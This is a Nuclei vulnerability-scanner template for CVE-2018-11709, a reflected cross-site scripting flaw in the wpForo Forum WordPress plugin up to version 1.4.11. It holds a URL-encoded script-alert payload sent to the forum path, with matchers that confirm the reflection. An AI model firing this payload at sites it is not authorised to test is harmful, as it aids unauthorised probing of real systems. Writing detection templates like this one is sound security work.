nuclei-templates/cves/2018/CVE-2018-11709.yaml

30 lines
638 B
YAML
Raw Normal View History

2021-07-15 17:14:42 +00:00
id: CVE-2018-11709
info:
name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
tags: cve,cve2018,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200